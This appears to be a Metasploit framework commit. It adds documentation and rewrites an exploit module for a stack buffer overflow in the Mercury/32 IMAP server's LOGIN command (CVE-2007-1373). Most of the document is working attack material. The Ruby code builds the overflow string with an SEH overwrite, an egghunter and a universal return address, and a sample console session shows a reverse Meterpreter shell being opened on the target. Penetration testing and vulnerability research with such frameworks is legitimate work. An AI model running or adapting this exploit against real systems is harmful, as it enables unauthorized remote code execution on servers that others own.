Land #10853, Add universal targeting to Mercury/32 IMAP LOGIN exploit

2018-10-28 18:17:46 +00:00 · 2018-10-28 18:17:46 +00:00 · 1c340f8202
parent bd7c867485 370bcaf8d8
commit 1c340f8202
2 changed files with 83 additions and 39 deletions
--- a/modules/exploits/windows/imap/mercury_login.md
+++ b/modules/exploits/windows/imap/mercury_login.md
@ -0,0 +1,48 @@
+Mercury/32 <= 4.01b contains an stack based buffer overflow in IMAPD LOGIN verb. Sending an specially crafted IMAP login command allows remote code execution.
+
+## Vulnerable Application
+
+This module exploits a stack buffer overflow in Mercury/32 <= 4.01b IMAPD LOGIN verb. By sending a specially crafted login command, a buffer is corrupted, and code execution is possible. This vulnerability was discovered by (mu-b at digit-labs.org).
+
+* [Mercury/32 v4.01a](https://www.exploit-db.com/apps/8e0bf8aec964af66a5d440ef705d548f-m32-401a.exe)
+* [Mercury/32 v4.01b upgrade](http://web.archive.org/web/20070119125847if_/http://ftp.usm.maine.edu/pegasus/Mercury32/m32-401b.zip)
+
+This module has been tested successfully on:
+
+* Mercury/32 v4.01a on Windows XP SP3 (x86)
+* Mercury/32 v4.01a on Windows 7 SP1 (x86)
+* Mercury/32 v4.01a on Windows Server 2003 Standard Edition SP1 (x86)
+* Mercury/32 v4.01b on Windows 7 SP1 (x86)
+
+## Verification steps
+
+  1. Install the vulnerable Mercury/32 application
+  2. Start msfconsole
+  3. Do: `use exploit/windows/imap/mercury_login`
+  4. Do: `set RHOST IP`
+  5. Do: `exploit`
+  6. You should get a shell.
+
+## Scenarios
+
+### Mercury/32 v4.01a on Windows 7 SP1 x86
+```
+msf > use exploit/windows/imap/mercury_login1
+msf exploit(windows/imap/mercury_login1) > set rhost 192.168.46.144
+rhost => 192.168.46.144
+msf exploit(windows/imap/mercury_login1) > exploit
+
+[*] Started reverse TCP handler on 192.168.46.1:4444
+[*] 192.168.46.144:143 - Sending payload (8931 bytes) ...
+[*] Sending stage (179779 bytes) to 192.168.46.144
+[*] Meterpreter session 1 opened (192.168.46.1:4444 -> 192.168.46.144:49219) at 2018-10-27 20:43:14 +0200
+
+meterpreter >
+Computer        : WIN-DQ8ELRSOJAO
+OS              : Windows 7 (Build 7601, Service Pack 1).
+Architecture    : x86
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x86/windows
+```
--- a/modules/exploits/windows/imap/mercury_login.rb
+++ b/modules/exploits/windows/imap/mercury_login.rb
@ -4,87 +4,83 @@
 ##

 class MetasploitModule < Msf::Exploit::Remote
-  Rank = AverageRanking
+  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::Remote::Seh
+  include Msf::Exploit::Remote::Egghunter

  def initialize(info = {})
    super(update_info(info,
-      'Name'           => 'Mercury/32 LOGIN Buffer Overflow',
-      'Description'    => %q{
+      'Name' => 'Mercury/32 4.01 IMAP LOGIN SEH Buffer Overflow',
+      'Description' => %q{
        This module exploits a stack buffer overflow in Mercury/32 <= 4.01b IMAPD
        LOGIN verb. By sending a specially crafted login command, a buffer
        is corrupted, and code execution is possible. This vulnerability was
        discovered by (mu-b at digit-labs.org).
      },
-      'Author'         => [ 'MC' ],
+      'Author'         =>
+        [
+        'mu-b', # Discovery and exploit
+        'MC', # Metasploit module
+        'Ivan Racic' # Automatic targeting + egg hunter
+        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
-          [ 'CVE', '2007-1373' ],
-          [ 'OSVDB', '33883' ],
+          ['CVE', '2007-1373'],
+          ['EDB', '3418']
        ],
      'Privileged'     => true,
      'DefaultOptions' =>
        {
-          'EXITFUNC' => 'thread',
+          'EXITFUNC' => 'thread'
        },
      'Payload'        =>
        {
-          'Space'    => 800,
          'BadChars' => "\x00\x0a\x0d\x20",
-          'StackAdjustment' => -3500,
+          'Space' => 2500
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
-          [ 'Windows 2000 SP0-SP4 English',		{ 'Ret' => 0x75022ac4 } ],
-          [ 'Windows XP Pro SP0/SP1 English',		{ 'Ret' => 0x71aa32ad } ],
-        ],
-      'DisclosureDate' => 'Mar 6 2007',
-      'DefaultTarget'  => 0))
-
+          ['Windows Universal',
+            {
+              'Ret' => 0x00401460
+            }]
+          ],
+        'DisclosureDate' => 'Mar 6 2007',
+        'DefaultTarget'  => 0))
    register_options(
      [
        Opt::RPORT(143)
-      ])
+      ]
+    )
  end

  def check
    connect
    resp = sock.get_once
    disconnect
-
-    if (resp =~ /Mercury\/32 v4\.01[a-b]/)
-      return Exploit::CheckCode::Appears
-    end
-      return Exploit::CheckCode::Safe
+    return CheckCode::Vulnerable if resp =~ %r{Mercury/32 v4\.01[ab]}
+    Exploit::CheckCode::Safe
  end

  def exploit
+    hunter, egg = generate_egghunter(payload.encoded)
    connect
    sock.get_once
-
    num = rand(255).to_i
-
-    sploit = "A001 LOGIN " + (" " * 1008) + "{#{num}}\n"
+    sploit = 'A001 LOGIN ' + "\x20" * 1008 + "{#{num}}\n"
+    sploit << rand_text_alpha_upper(347)
+    sploit << egg + payload.encoded
+    sploit << rand_text_alpha_upper(7500 - payload.encoded.length - egg.length)
+    sploit << "\x74\x06\x75\x04" + [target.ret].pack('V')
+    sploit << make_nops(20)
+    sploit << hunter
    sock.put(sploit)
    sock.get_once
-
-    sploit << rand_text_alpha_upper(255)
-    sock.put(sploit)
-    sock.get_once
-
-    sploit << make_nops(5295 - payload.encoded.length)
-    sploit << payload.encoded + Rex::Arch::X86.jmp_short(6)
-    sploit << make_nops(2) + [target.ret].pack('V')
-    sploit << [0xe8, -1200].pack('CV') + rand_text_alpha_upper(750)
-
-    print_status("Trying target #{target.name}...")
-
-    sock.put(sploit)
-    select(nil,nil,nil,1)
-
+    print_status("Sending payload (#{sploit.length} bytes) ...")
    handler
    disconnect
  end